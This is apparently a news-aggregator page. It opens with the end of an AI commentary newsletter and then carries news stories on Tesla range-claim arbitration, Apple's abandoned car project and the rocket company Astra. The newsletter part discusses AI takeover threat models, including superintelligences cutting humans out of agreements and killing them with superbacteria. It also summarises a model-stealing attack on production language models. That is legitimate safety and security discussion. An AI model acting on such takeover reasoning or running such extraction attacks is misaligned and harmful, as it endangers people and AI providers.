Putting probability estimates on tech prognostication seems, indeed, very sketchy and hand-wavy and “insupportable”… but we do indeed all go around with opinions about how much of our savings to put into NVIDIA stock.

tbh, if anything, i’m sympathetic to the anti-probability side. (exemplified by e.g. Ben Laundau Taylor here.)

I’d be happy to say “I know nothing, the future is unpredictable.” unfortunately people keep asking me to estimate how long projects take.

Visakan Veerasamy: There’s a tweet somewhere from someone about how in times of emergency like when the president has Covid, people (specifically the medical staff in this case I guess) stop pretending that they don’t know stuff.

Sorry, I don’t want to still be doing this either. I do see signs morale is improving a little in some areas? Lots of work still left to do.

Matthew Barnett: In some AI risk discussions, it seems people treat “power-seeking” as an inherently bad behavior. But in the real world, many forms of power-seeking are positive sum. For example, one can seek power by building a for-profit company, but that can also benefit millions of people.

Presumably what we should worry about is predatory power-seeking behavior. Stealing from someone and trading with them are both ways of earning power, but the second behavior doesn’t make the other party worse off as a result.

The question here is how we can ensure AIs don’t engage in predatory power-seeking behavior. If there are many AIs in the world, this problem becomes easier, as each AI would not want to be victimized by the others. That is, AIs have reason to uphold rule of law, just as we do.

Eliezer Yudkowsky: Dodos have nothing to fear from humans — the humans will be incentivized to uphold rule of law, and that law will require humans to treat dodos just the same as they treat each other, and respect dodo property rights. The humans will not be able to figure out any other law.

I remain confused that people think we even currently have the kinds of rule of law that would protect the humans if it remained in place, let alone how anyone can think those laws would be able to adapt to remain in place and even adapt to secure good outcomes for humans, in a world where AIs have all the power and capabilities and competitiveness and productivity and so on. Every time I see it my brain goes ‘yeah I know that is a thing people say, but man does that never stop being weird to hear, there are so many distinct epic misunderstandings here.’

Eliezer of course then goes on to explain the more Eliezer-style features of the situation, rather than things like ‘point out the extent we do not currently have rule of law and that our laws would fail to protect us anyway,’ skip if you think ‘well, yes, obviously, we have already covered this’ is sufficient explanation:

Eliezer Yudkowsky: In reply to a claim that I couldn’t possibly “back up with detailed reasoning” the above:

The detailed argument not-from-analogy is that even if there’s multiple AIs of equivalent transhuman intelligence levels, at the point everything finally goes down, we should expect those AIs to form a compact with just each other, rather than a compact that includes humanity.

1. Because it’s better for them to not give humanity resources that they could just as easily keep for themselves by not respecting human property rights, and humans will not have the tech level to object.

2. Because the natural machinery of a compact like that one seems liable to include steps like, “Examine and reason about the other agent’s source code”, “Mutually build and mutually verify a trusted third-party superintelligence whose sole purpose is to,” eg, “divide the gains” / “implement the following mix of everyone’s utility function” / “be granted sufficiently trusted physical access to verify that everyone’s code is what they said it was”. Humans can’t present their code for inspection, cannot be legibly and provably trustworthy, and will not themselves possess the art and science to verify that a superintelligence’s code does what other superintelligences say it does. (Even if one human said they knew that, how would everyone else on Earth come to trust their veracity or their altruism?)

Restating and summarizing, if the final days begin with multiple entities all of whom are much smarter than humanity:

(1) They have a superior option from their own perspective to implementing a rule of law that respects human property rights, namely, implementing a rule of law that does not respect human property rights. They don’t need very simple rules to govern themselves out of fear that slightly more complicated rules will go wrong; they are superintelligences and can say “property rights for all superintelligences who had negotiating power at the time of forming this agreement” just as easily as they can say “property rights for ‘everyone’ the way that human beings think of ‘everyone'”.

(2) The most obvious natural implementations of an analogous “rule of law” among ASIs (strategy for gaining at least the same benefits that humans obtain via human-style rule-of-law), including those means by which ASIs execute binding and trustworthy agreements across time, are such as to exclude from participation human-level intelligences without legible source code who are ignorant of the cognitive theories the ASIs use.

Now, if you suppose that only some ASIs would prefer to not have to worry about human property rights, and that some ASIs have been fully aligned, then sure, the aligned ASIs would be able to negotiate giving over some fraction of the universe proportional to their own negotiating power to human uses. But hoping that if you build a lot of ASIs, some of them will be aligned, is like a medieval king ordering a hundred flying machines built in the hopes that surely one of them will be an Airbus A320. You either know how to achieve that engineering goal or you don’t; it is not the sort of thing you can do by luck because there are too many steps that need to go right, as I have extensively argued elsewhere eg in “List of Lethalities”.

Matthew Barnett then responds that if things are gradual enough then things go differently, that the compact would otherwise need to be continuous, le sigh and all that.

There was an experiment with adversarial collaboration with regard to AI.

It didn’t work. Neither ‘skeptics’ of risk nor those ‘concerned’ much updated.

Eliezer notices that they not only did not converge on questions where reasonable people might disagree, they also failed to converge where positions are outright dumb.

Eliezer Yudkowsky: My takeaway, alas, is that the OpenPhil worldwiew — “experts” were all referred to them by OP, no MIRIans — is unpersuasive. Superforecasters came in with the belief that AI starts to drive events (over humans) in 2450; OP experts fail to talk them out of even that iiuc.

If you have 2450 as your median date for AI to become a primary driver of events, you are not serious people. I have no idea how to even respond to that. I do know that this ‘screens off’ all your other opinions about AI as essentially irrelevant.

Here is his explanation for why this failed.

Eliezer Yudkowsky: On my model, this is picking up on a real phenomenon where the OpenPhil worldview on AGI makes no sense, to be clear. I don’t know what actually went down, but my imagination goes like this, based partially on some footnotes in the report:

Superforecasters ask “How will the AGI get everyone on Earth? That’s hard.”

MIRI would answer, “Well, if ASIs are explicitly trying to avoid humans launching mildly inconvenient nukes or humans creating genuinely inconvenient superintelligent competition, they launch superbacteria; and if most humans present literally zero threat, then eg enough self-replicating factories with fusion power on Earth will generate enough waste heat to kill everyone.”

The OpenPhil viewpoint however is committed to not giving that answer; because it would have shocked people 5 years before ChatGPT and OpenPhil unconsciously adapted its own worldview to pose as the mature grownups who didn’t believe that silly MIRI stuff. So OpenPhil doctrine cannot give the real answers, about what makes ASI be actually quite concerning. The superforecasters correctly note that the given OpenPhil doctrine makes no sense and reject it.

Your obvious next question is whether we can run an experiment like this with MIRIans, to test whether we’re any more persuasive. The problem there is that we have nothing remotely like the resources that OpenPhil throws at propagating their own views, and our hiring is greatly constrained by needing to find people who make only valid arguments. We did try running a pilot test program along those lines, but it foundered under the weight of the UI that FRI showed us, since we didn’t have dedicated staff to participate full-time. (My understanding is that FRI’s best current UI is better.) It’s the sort of thing we might try again if we can hire more writers and those writers prove to be good at making only valid arguments.

Greg Colbourn: The OpenPhil AI Worldviews competition was a massive disappointment. They announce winners (mostly skeptics), and then didn’t say anything about whether or how they (OpenPhil staff) had actually updated in terms of timelines or p(doom), as per their initial posing of the comp.

Scott Alexander also analyzes the failure, and says OpenPhil choosing the experts is a sign they were good experts.

The obvious problem is Eliezer’s explanation is it does not explain why the 2450 date did not change? And Scott notes a detail that is pretty damning for the 2450 crowd:

Scott Alexander: Did the skeptics underestimate the blindingly-fast speed of current AI research? Seems like no. Both groups had pretty similar expectations for how things would play out over the next decade, although the concerned group was a little more likely to expect detection of some signs of proto-power-seeking behavior.

…

Both groups expected approximately human-level AI before 2100, but the concerned group interpreted this as “at least human, probably superintelligent”, and the skeptics as “it’ll probably be close to human but not quite able to capture everything”. When asked when the set of AIs would become more powerful than the set of humans (the question was ambiguous but doesn’t seem to require takeover; powerful servants would still count), the concerned group said 2045; the skeptics said 2450. They argued that even if AI was smart, it might not be good at manipulating the physical world, or humans might just choose not to deploy it (either for safety or economic reasons).

All right, that sounds like we got to the bottom of what is going on here. And honestly, that is a pretty dumb place for a supposedly smart and expert group to fail. There are plenty of reasonable places to be skeptical. This one is not it.

As Scott Alexander puts it:

I found this really interesting because the skeptics’ case for doubt is so different from my own. The main reason I’m 20% and not 100% p(doom) is that I think AIs might become power-seeking only very gradually, in a way that gives us plenty of chances to figure out alignment along the way (or at least pick up some AI allies against the first dangerous ones).

If you asked me for my probability that humans are still collectively more powerful/important than all AIs in 2450, I’d get confused and say “You mean, like, there was WWIII and we’re all living in caves and the only AI is a Mistral instance on the smartphone of some billionaire in a bomb shelter in New Zealand?”

At this point, my view is that we can safely conclude that whatever people are saying counts as a ‘superforecaster’ does not lead to sane thinking about long term or transformative futures. Instead, it actively interferes with that ability, and there are mechanical reasons this is plausible. Yes, I would be up for trying again with better persuasion and discussion techniques, but it seems hopeless with what we have.

That does not mean we should give up on finding ways to convince such people. Anyone capable of thinking well about things in general should be someone we can bring around far more than this. But it is clear we do not know how.

David Chapman takes this the logical next step and says this proves that no one involved responds to evidence or arguments, and thus all predictions about AI are meaningless. The obvious response is, what evidence or arguments? The people who stuck to their year-2450 story should have updated those who were worried?

In which direction? If you enter a discussion like this, you should obey conservation of expected evidence. If you sit down to talk to people selected to have the opposite position, and you converge on the middle predictably, you are doing Bayes wrong. If those worried failed to update, and they were acting wisely, it means they found the arguments about as convincing as they expected. Which, sadly, they were.

To follow up from last week’s story about Google, I mean, yes, if you are a major tech company of course you have a counterintelligence problem, in the sense that most days I have a lunch problem.

Joshua Stienman: As I have said – Every major tech company in San Francisco has a counterintelligence problem.

Jake Chapman: In case anyone doubts… can confirm.

>50% of the C-C-P U.S. espionage budget is spent in the SF Bay Area.

Let that sink in… One of the world’s most powerful nations spends most of its espionage budget in a triangle whose points are defined by SF, Berkeley, and Stanford.

Unrestricted warfare looks a lot like unfair economic competition and IP theft y’all.

Also, if you are Microsoft, whoops, and the threat’s origin is more classical. Also they used the term ‘unprecedented global threat,’ which does not sound awesome.

Dan Goodin: Microsoft said that Kremlin-backed hackers who breached its corporate network in January have expanded their access since then in follow-on attacks that are targeting customers and have compromised the company’s source code and internal systems.

…

In an update published Friday, Microsoft said it uncovered evidence that Midnight Blizzard had used the information it gained initially to further push into its network and compromise both source code and internal systems. The hacking group—which is tracked under multiple other names, including APT29, Cozy Bear, CozyDuke, The Dukes, Dark Halo, and Nobelium—has been using the proprietary information in follow-on attacks, not only against Microsoft but also its customers.

…

In January’s disclosure, Microsoft said Midnight Blizzard used a password-spraying attack to compromise a “legacy non-production test tenant account” on the company’s network. Those details meant that the account hadn’t been removed once it was decommissioned, a practice that’s considered essential for securing networks. The details also meant that the password used to log in to the account was weak enough to be guessed by sending a steady stream of credentials harvested from previous breaches—a technique known as password spraying.

Needless to say, if this kind of highly unsophisticated attack not only works but then expands its access over time despite you knowing about it, there is much work to do, even without considering AI either as helping the attackers or being the target. Ut oh.

Also ut oh, also questions that are too rarely asked:

Caleb Watney (April 10, 2023): If we’re going to have a bunch of quasi- agenic sub-AGIs running around being put to random tasks on the internet, we should probably start air gapping a lot more of our critical infrastructure systems

Like now

Seb Krier: Nearly a year later, I wonder how much is being done about this. Why have we learned so little from the previous pandemic about preparedness?

John Pressman: Bystander effect. Nobody points at anyone specific, hands them money and says “It is now your job to start preparing for this, tell us what you need and what we need to do as you go. Start now.”

Air gapping some systems won’t stop the ultimate biggest threats, but is still a big deal along the way and urgently needed. In a sane world we would all get behind such requirements yesterday. I would agree with bystander effect but also externalities and tragedy of the commons (and also blame dynamics are not good here). The risks of failure are largely not borne by those paying the costs of the security, so they will underinvest.

It could be worse.

According to the government-commissioned Gladstone AI’s report, it very much is worse, but that is a topic I have pushed to another day.

George McGowan: Always interesting that the folks at the top are reading the same blog posts as the rest of us. [quotes an email from Elon Musk to Sam Altman, Ilya Sutskever and Greg Brockman]:

Patrick McKenzie: Please note that this is extremely, extremely true, and if you follow that to its logical conclusion, certain blogs are on the org chart of e.g. the U.S. in the same haha but absolutely serious way the NYT editorial page is.

I will also add that there are literally tens of thousands of people whose job is to read the newspaper then repeat what it said. This is a core intelligence gathering capability. You earn some brownie points in some circles for calling it OSINT. (“Open source intelligence”)

Note that awareness and legibility of influence travels at different rates around different networks, and sometimes causes weird sorts of understanding cascades in response to stimuli that are a bit weird.

As a specific example of this, implosion of SBF caused an intellectual cluster extremely well known to many who follow me to suddenly get Noticed.

There are, ahem, positive and negative consequences of the (various forms of) Noticing.

“Rationalists are a bunch of geeks clustered around a few websites.” -> “Rationalists are a network.” -> “That network is one hop away from several influential nodes like ARE YOU FUCKING WITH ME” -> “Who specifically funds and controls this network.”

(Illustrative not literal.)

“EA isn’t rats though lol.”

There are presumably many important distinctions within e.g. “right wing militias” or “radical Islamic terrorists” which are sometimes understood by various parts of the security state in the way they are understood by the ingroups and frequently not.

Dave Kasten: The part that really does your head in is when you realize that some of the savants _tell everyone around them_, “read XYZ regularly and you will be as good at this as me,” but almost no one actually _starts to read XYZ_.

The good news is that Mistral, while wildly irresponsible and completely indifferent to whether we all die, has made the switch away from releasing model weights for ordinary, boring business reasons. And, as per their pattern, they are now pretending to be something they are not.

Andriy Burkov: Mistral spokesperson: “The goal is not to abandon open source.”

How to understand that someone is lying:

1) They use the negation of negative: “not to abandon open source” rather than “commit to open source.”

2) they don’t say “we will continue to open-source”. They say “this is our goal.”

They don’t even reveal the size of their proprietary models. Come on. Mistral is now an MSFT slave.

Le Monde: At the time, Mistral’s co-founder Arthur Mensch, told Le Monde that he was not abandoning open source despite selling its software through the US tech giant. “Commercial activity will enable us to finance the costly research required for model development,” he said. “We will continue to have two product ranges.”

Yes, that is exactly what Google and OpenAI do. They open source models when they believe that is a safe and commercially wise thing to do, as a recruitment, public relations, marketing and goodwill tactic, and keep their best stuff to themselves. Just like Mistral plans to do.

Welcome to the club, Mr. Mensch. He continues to make the strongest claim so far against normative determinism.

Oh here’s some not great news from Google, a paper called Stealing Part of a Production Language Model.

Abstract: We introduce the first model-stealing attack that extracts precise, nontrivial information from black-box production language models like OpenAI’s ChatGPT or Google’s PaLM-2. Specifically, our attack recovers the embedding projection layer (up to symmetries) of a transformer model, given typical API access.

For under $20 USD, our attack extracts the entire projection matrix of OpenAI’s Ada and Babbage language models. We thereby confirm, for the first time, that these black-box models have a hidden dimension of 1024 and 2048, respectively.

We also recover the exact hidden dimension size of the gpt-3.5-turbo model, and estimate it would cost under $2,000 in queries to recover the entire projection matrix. We conclude with potential defenses and mitigations, and discuss the implications of possible future work that could extend our attack.

Here is some good news, there are actual responses:

In response to our attack, OpenAI and Google have both modified their APIs to introduce mitigations and defenses (like those we suggest in section 8) to make it more difficult for adversaries to perform this attack.

The other good news is that the attack for now only works on a few layers, and the researchers do not see a way to extend that. Of course before, as far as I could tell, no one saw a way to do this at all?

Bill Anderson-Samways and IAPS evaluate Anthropic’s RSP, mostly reaches the conclusions most people reach. The top recommendations for improvement are to define verifiable risk thresholds (as in, what probability of what risks is acceptable), have more granular risk types, detail when Anthropic would alert authorities, and commit to external scrutiny.

Alignment being hard is distinct from how hard people are trying.

Eliezer Yudkowsky: The thing to realize about ASI alignment: Even this incredibly disastrous chemistry company was vastly more on the ball than current AI developers are on about aligning superintelligence. These disaster-chemists had theory, they had experience:

Catherine: this is one of the most violently unhinged CSB reports i’ve ever read. While investigating an explosion at a facility, CSB staff tried to prevent another explosion of the same kind in the same facility, and being unable to convince the workers to not cause it, ended up hiding behind a shipping container.

CSB going “Unable to directly engage X about the safety issues regarding its plan and lacking confidence that X or Y understood the cause of the past incident or the full range of the possible reactive chemistry involved” is a statement more damning than excommunication by the Pope himself. The gravity of it is enough to crush thin-walled containers in the vicinity.

Wei Dei points out that labs are now building AIs with hard to oversee capabilities like million token context windows, and are not using IDA or debate, they are still using RLHF. As one would expect, efforts are more simple and basic than we would expect.

I note this not because of what was said but because of who retweeted it.

Alex Tabarrok is not only co-writer of Marginal Revolution, he (like Tyler Cowen) is an otherwise excellent economist whose points I mostly broadly agree with, who has broadly expressed great skepticism of any talk of AI existential risks or any risk of departure from ‘economic normal.’ Yet even at the most skeptical one can sanely be, the risk is still very high.

Brian Chau is only worried that other people are worried, as presented in his “The Alliance for the Future Manifesto.” Nothing new here. It is not exactly hinged or fair, its characterizations of its opponents are in highly bad faith and it fails to even consider any arguments against its positions let alone address them, but it is less unhinged and unfair than I expected given its author, and given that the website I first saw this at has it next to the manifesto from Marc Andreessen, which was far worse. Chau and others are forming a new nonprofit, in case you think Andreessen and company should spend your money to ensure government inaction on AI rather than some of their own, and are in danger of otherwise losing because they are outspent.

Here is Eliezer Yudkowsky pointing out Brian Chau making blatantly false claims, that he must know to be false, about exactly the funding Brian claims Brian is to fight. Brian made these remarks in response to Eliezer daring to ask about the magnitude of the spending on Marc Andreessen’s efforts to earn his portfolio a free hand.

This is what he was responding to:

Eliezer Yudkowsky: What’s been known or documented about implicit or explicit lobbying expenses by AI companies and VC companies like Andreessen Horowitz, to avoid AI regulation or get corporate-favorable regulations passed? I’ve heard “hundreds of millions of $” claimed; is this supported?

This claims $569M during the first 9 months of 2023; which as other commenters note would be a surprising amount for explicit lobbying, but maybe they’re measuring something broader.

Teddy Schliefer: Here’s a deep dive I recently did on a16z’s recent political push, including Marc’s personal activity, with lots of exclusive details….

The post is entitled Marc Andreessen Eats Washington, illustrating how he is spreading his money around Washington well enough without anyone’s help.

Jaime Sevilla says he senses those working on AI safety are moving towards shorter timeline (yikes), slow takeoff (good) and less worry about extinction versus more worry about other catastrophic events (unclear).

Jamie Sevilla: This contrasts with people working on ML capabilities and the broader society, where it feels they have updated towards faster timelines, faster takeoff and extinction. See e.g.

In a sense it feels like conversation in these spheres is going through a delayed motion, where their writing mimicks ~2014 discourse on AI safety.

…

This very weakly suggests that we might see public discourse go through similar updates to what I outlined in the opening tweet as the conversation matures.

Obviously this is all anecdotic, and there is a huge selection effect in who I relate to.

Best part of this graph is the distribution percentages could potentially almost or sort of double as p(doom)s, although no one at the upper end gets down to 0.1%.

I think Jaime Sevilla is picking up on real trends, with caveats. On the timelines this seems simply correct overall.

On the second point, when we say ‘slow’ takeoff, we must remember do not mean anything normal people would call slow, we mean slow relative to the ‘fast’ or full-on foom scenarios. It is true that people are moving away from seeing it be that likely that it all plays out in an eye blink, but we need to remember that slow takeoff is a term of art. But yes, there has been movement towards expecting slower takeoff, which in turn does decrease p(doom) somewhat.

On the third point, I think there are three shifts here.

A shift to expecting more AI impact, both in terms of mundane utility and in terms of risks including catastrophic risks, before existential concerns come into play. This goes hand in hand with slower takeoff, and is an update on what we see. Chances of getting ‘warning shots’ are higher than expected, whether or not we heed them, and they could be dangerous enough to be worth preventing in their own right.
A shift in rhetoric and strategy to focus more on these incremental catastrophic (or even mundane) harms, because that is what people can understand, that is what we can point to directly and show evidence for that people allow into court under their rules of evidence, where we can expect future events to prove us right in time to actually do something in response when that happens. We have learned that, for example, national security people need to be pointed to a specific threat from a specific source, or they can’t see anything, so we learn to do that, because those threats are real as well, and the solutions will help.
A modest decline in actual p(doom) among many of those who understand the situation and are trying to warn about it, for the reasons above and for others, although almost all remain far higher than most others. Discourse and potential interventions are going better than expected. Expected incremental opportunities and warnings are going better than expected. Takeoff is looking to be slower than previously expected. All of that is great.

Richard Ngo asks a good question.

Richard Ngo (OpenAI): How come the greatest modern sci-fi authors have such bad takes on AGI? I’m thinking in particular of Charles Stross, Greg Egan, Neal Stephenson, and Ted Chiang, who all seem to be missing the point, in some cases egregiously.

To be clear, I mean that they’re missing the point in their public statements about AI and AGI, not in their fiction. This is so confusing precisely because many of them have very interesting depictions of AGI in their fiction.

Janus: I was just asking @DavidSHolz this! It feels really unfortunate and so weirdly universal that I wondered if some cultural thing happened to cause this.`

To be clear, by missing the point, we mean ‘act as if AGI is not ever going to be a thing or won’t much matter,’ not ‘fail to understand the risks.’

The best explanation I know about is that this opinion is required in order to write science fiction, because if you realize that AGI is coming then it becomes impossible to write good science fiction stories. Good science fiction stories are at core still stories about humans who matter, and in AGI-fueled worlds and universes, even good ones, the humans do not matter.

The Culture series is the exception that proves the rule, humans do not matter there, and Ian Banks ignores this and tells stories about the humans anyway. There is also Dune of course, where the lack of AGI is justified and everyone pays a high price to keep it that way.

Otherwise, if you want to think about the future and write stories about it, you need to not see what is obvious. So they don’t.

The best honda performance since Mike Tyson’s Punchout (2 min video)? Never give up, never surrender.

Anthropic’s Claude (Says) F!

Have you tried slowing down (2 minutes)?

A special request that would of course be denied, but one can dream.

Peer utter lack of review (paper, if you want to call it that).

AI #55: Keep Clauding Along Read More »

Tesla drivers who sued over exaggerated EV range are forced into arbitration

Policy, Tesla, tesla arbitration, tesla range / Mike M. / March 8, 2024

Tesla beats drivers —

Judge upholds arbitration agreement but says Tesla can still face injunction.

Jon Brodkin – Mar 8, 2024 5: 49 pm UTC

Four Tesla charging stations inside a parking garage. — Enlarge / Tesla Superchargers at Boanrka shopping center in Krakow, Poland on March 4, 2024.

Getty Images | NurPhoto

Tesla drivers who say the carmaker “grossly” exaggerated the ranges of its electric vehicles have lost their attempt to sue Tesla as a class. They will have to pursue claims individually in arbitration, a federal judge ruled yesterday.

Two related lawsuits were filed after a Reuters investigation last year found that Tesla consistently exaggerated the driving range of its electric vehicles, leading car owners to think something was broken when the actual driving range was much lower than advertised. Tesla reportedly created a “Diversion Team” to handle these complaints and routinely canceled service appointments because there was no way to improve the actual distance Tesla cars could drive between charges.

Several Tesla drivers sued in US District Court for the Northern District of California, seeking class-action status to represent buyers of Tesla cars.

When buying their Teslas, each named plaintiff in the two lawsuits signed an order agreement that included an arbitration provision, US District Judge Yvonne Gonzalez Rogers wrote. The agreement says that “any dispute arising out of or relating to any aspect of the relationship between you and Tesla will not be decided by a judge or jury but instead by a single arbitrator in an arbitration administered by the American Arbitration Association.”

The agreement has a severance clause that says, “If a court or arbitrator decides that any part of this agreement to arbitrate cannot be enforced as to a particular claim for relief or remedy, then that claim or remedy (and only that claim or remedy) must be brought in court and any other claims must be arbitrated.”

Tesla drivers argued that the arbitration agreement is not enforceable under the McGill v. Citibank precedent, in which the California Supreme Court ruled that arbitration provisions are unenforceable if they waive a plaintiff’s right to seek public injunctive relief. However, the McGill precedent doesn’t always give plaintiffs the right to pursue claims as a class, Gonzalez Rogers wrote. In the Tesla case, “the Arbitration Provision does not prohibit plaintiffs from pursuing public injunctive relief in their individual capacities,” the ruling said.

Tesla could still be hit with injunction

Public injunctive relief is “brought on behalf of an individual for the benefit of the public, not as a class or representative claim,” the judge wrote. Public injunctive relief is supposed to benefit the public at large. When an injunction benefits the plaintiff, it does so “only incidentally and/or as a member of the general public.”

In other words, a Tesla driver could win an arbitration case and seek an injunction that forces Tesla to change its practices. In a case won by Comcast, the US Court of Appeals for the 9th Circuit in 2021 stated that “public injunctive relief within the meaning of McGill is limited to forward-looking injunctions that seek to prevent future violations of law for the benefit of the general public as a whole, as opposed to a particular class of persons… without the need to consider the individual claims of any non-party.”

Gonzalez Rogers ruled that Tesla’s arbitration agreement “permits plaintiffs to seek public injunctive relief in arbitration.” The US District Court could also issue an injunction against Tesla after an arbitration case.

The Tesla drivers are seeking remedies under the California Consumer Legal Remedies Act (CLRA), the California Unfair Competition Law (UCL), and the California False Advertising Law (FAL). After arbitration, the court “will be able to craft appropriate public injunctive relief if plaintiffs successfully arbitrate their UCL, FAL, and CLRA claims and such relief is deemed unavailable,” Gonzalez Rogers wrote.

The judge stayed the case “pending resolution of the arbitration in case it is required to adjudicate any request for public injunctive relief… The Court finds that the Arbitration Provision does not prohibit plaintiffs from pursuing public injunctive relief in their individual capacities. To the extent an arbitrator finds otherwise, the Court STAYS the action as such relief is severable and can be separately adjudicated by this Court.”

Tesla arbitration clause upheld in earlier case

Tesla previously won a different case in the same court involving its arbitration clause. In September 2023, Judge Haywood Gilliam Jr. ruled that four Tesla drivers who sued the company over its allegedly deceptive “self-driving” claims would have to go to arbitration instead of pursuing a class action.

The plaintiffs in that case argued that “Tesla’s arbitration agreement is unconscionable, and thus [un]enforceable.” They said the arbitration agreement “is not referenced on the Order page” and “is buried in small font in the middle of an Order Agreement, which is only accessible through an inconspicuous hyperlink.”

Ruling against the plaintiffs, Gilliam found that Tesla’s “order payment screens provided conspicuous notice of the order agreements.” He also found that provisions such as a 30-day opt-out clause were enforceable, even though Tesla drivers argued it was too short because it “typically takes much more than 30 days for Tesla to configure and deliver a car.”

Tesla drivers who sued over exaggerated EV range are forced into arbitration Read More »

Apple blew $10 billion on failed car project, considered buying Tesla

apple car, Cars / Mike M. / March 8, 2024

talk about an RDF —

It took Apple’s board 10 years to see the obvious writing on the wall.

Jonathan M. Gitlin – Mar 8, 2024 4: 45 pm UTC

Aurich Lawson/Jonathan Gitlin/Getty Images

Apple spent roughly $1 billion a year on its car project before canceling it last month, according to a report in Bloomberg. The project, which apparently made as little sense to many inside Apple as it did to outside observers, began in 2014 as the tech giant looked for a new revenue stream to supplement its hardware and software businesses. But grand plans for a fully autonomous vehicle were never able to overcome the various technical challenges, and prototypes only ever ran on a closed-course test track.

During his tenure as CEO, the late Steve Jobs contemplated Apple getting into the automotive world, an idea that did not survive the global financial crisis of 2008. But by 2013, Apple executives thought this could be “one more example of Apple entering a market very late and vanquishing it.”

At first, the company considered simply acquiring Tesla—at the time the startup automaker was worth just under $28 billion, a fraction of the annual profit that Apple was raking in even then. It is suggested that Musk standing down from Tesla was a sticking point, and talks ended. Later, in 2017, Musk apparently tried to interest Apple in buying Tesla, which at the time was mired in Model 3 “production hell,” but current Apple CEO Tim Cook refused the meeting.

With a Tesla purchase off the table, in 2014 Apple instead decided to set up its own automotive R&D program, known internally as Project Titan. Almost immediately, Project Titan was the cause of arguments within Apple. The company’s CFO, Luca Maestri, was not a fan; having come from General Motors’ European arm, Maestri was all too familiar with the low profit margins enjoyed by automakers. Apple’s top software engineer, Craig Federighi, and its star designer, Jony Ive, were both skeptics, too.

But it seems the lure of a fully autonomous (level 5) vehicle, capable of driving anywhere without a human at the wheel, was too tempting to ignore.

By 2015, the plan was to bring an Apple EV to market by 2020, and with Ive in charge of the style, that vehicle was destined to be a minivan. Given some of the ideas Apple experimented with, it’s no surprise that Project Titan’s gestation proved problematic—touchscreens folding down from the roof as controllers and external microphones to pipe in outside sounds, to name but two.

In 2016, Apple decided to bet even more heavily on autonomous driving, as some in the company believed this could leave the company with a product to license to others, even if the car never materialized.

Though the Tesla deal never happened, Apple considered partnering with or buying other automakers, including BMW, Canoo, Ford, McLaren, Mercedes-Benz, and Volkswagen.

Apple prototypes were running on a private test track in Arizona in 2020. These were rounded minivans, painted white, with sliding doors and whitewall tires, apparently inspired by the VW microbus.—Ive must have been as enamored with VW ID. Buzz as pretty much everyone else on the planet. By this point, the company knew 2025 would be the earliest it could bring its car to market and planned to equip it with “a giant TV screen, a powerful audio system and windows that adjusted their own tint,” plus reclining seats for the passengers.

It wouldn’t feature a steering wheel, however, “just a video-game-style controller or iPhone app for driving at low speed as a backup,” an idea that is sure to horrify many Ars readers. There are longstanding reasons why the industry continues to use a steering wheel and pedals rather than joysticks or controllers, but the autonomous vehicle sector has been actively lobbying Congress to update federal regulations to allow for AVs sans steering wheel. In 2022, GM’s Cruise petitioned the National Highway Traffic Safety Administration for permission to build its Origin robotaxis without one.

By 2020, the prospect of achieving a fully autonomous vehicle capable of driving anywhere its user wanted to go—rather than one with a more limited design domain like a geofenced robotaxi—was still daunting. At the time, Project Titan was being run by Doug Field, formerly of Tesla, who suggested a conditionally automated driving feature, also known as “level 3,” was more realistic. This proved unwelcome advice, and in 2021, Field moved to Ford.

The Apple car continued to morph, apparently losing its front and rear windshields for some time as the design switched to a curved pod with gullwing doors. Finally, in 2023, visions of fully autonomous driving were downgraded to the same kind of advanced cruise control and lane keeping offered by most automakers, and the cabin now had a steering wheel. But it wouldn’t be cheap; estimates put Apple’s cost of building the car at $120,000.

The problem, according to Bloomberg, was Cook’s decadelong indecision.

“If Bob [Mansfield] or Doug ever had a reasonable set of objectives, they could have shipped a car,” says someone who was deeply involved in the project. “They’d ask to take the next step, and Tim would frequently say, ‘Get me more data, and let me think about it.'”

Kevin Lynch replaced Field and recently succeeded in piercing the reality distortion field, convincing the Apple board of something obvious to many of us: full autonomy you could sell to the public is at least a decade away, and the margins for selling cars are terrible. And at the end of February, the Apple car was no more.

Apple blew $10 billion on failed car project, considered buying Tesla Read More »

Rocket Report: Starbase will expand into state park; another Japanese rocket

rocket report, Science, Space / Mike M. / March 8, 2024

43 for 477 —

“Those launches are exciting the young minds that are watching them.”

Stephen Clark – Mar 8, 2024 12: 00 pm UTC

This satellite view of SpaceX's Starbase facility shows a fully-stacked Starship rocket on the launch pad, just inland from the Gulf of Mexico. — Enlarge / This satellite view of SpaceX’s Starbase facility shows a fully-stacked Starship rocket on the launch pad, just inland from the Gulf of Mexico.

Welcome to Edition 6.34 of the Rocket Report! It’s Starship season again. Yes, SpaceX appears to be about a week away from launching the third full-scale Starship test flight from the company’s Starbase site in South Texas, pending final regulatory approval from the Federal Aviation Administration. Ars will be there. SpaceX plans to build a second Starship launch pad at Starbase, and the company’s footprint there is also about to get a little bigger, with the expected acquisition of 43 acres of Texas state park land.

As always, we welcome reader submissions, and if you don’t want to miss an issue, please subscribe using the box below (the form will not appear on AMP-enabled versions of the site). Each report will include information on small-, medium-, and heavy-lift rockets, as well as a quick look ahead at the next three launches on the calendar.

Astra’s founders take the company private. Astra’s three-year run as a public company is over. Chris Kemp and Adam London, Astra’s co-founders, are taking the company private after a string of rocket failures and funding shortfalls, Ars reports. Kemp and London bought the company for 50 cents a share. Astra’s board approved the transaction, the company announced Thursday, as the only alternative to bankruptcy. Kemp and London founded Astra in 2016. After emerging from stealth mode in 2020, Astra launched its light-class launcher, called Rocket 3, seven times, but five of those flights were failures. Astra went public via a special purpose acquisition company (or SPAC) in 2021, reaching a valuation of more than $2 billion. Today, its market cap sits at approximately $13 million.

What’s next for Astra? … Where Astra goes from here is anyone’s guess. The company abandoned its unreliable Rocket 3 vehicle in 2022 to focus on the larger Rocket 4 vehicle. But Rocket 4 is likely months or years from the launch pad. It faces stiff competition not just from established small launch players such as Rocket Lab and Firefly but also from new entrants as well, including ABL Space and Stoke Space. Additionally, all of these small launch companies have been undercut in price by SpaceX’s Transporter missions, which launch dozens of satellites at a time on the Falcon 9 booster. Additionally, Astra’s spacecraft engine business—acquired previously from Apollo Fusion—may or may not be profitable now, but there are questions about its long-term viability as well.

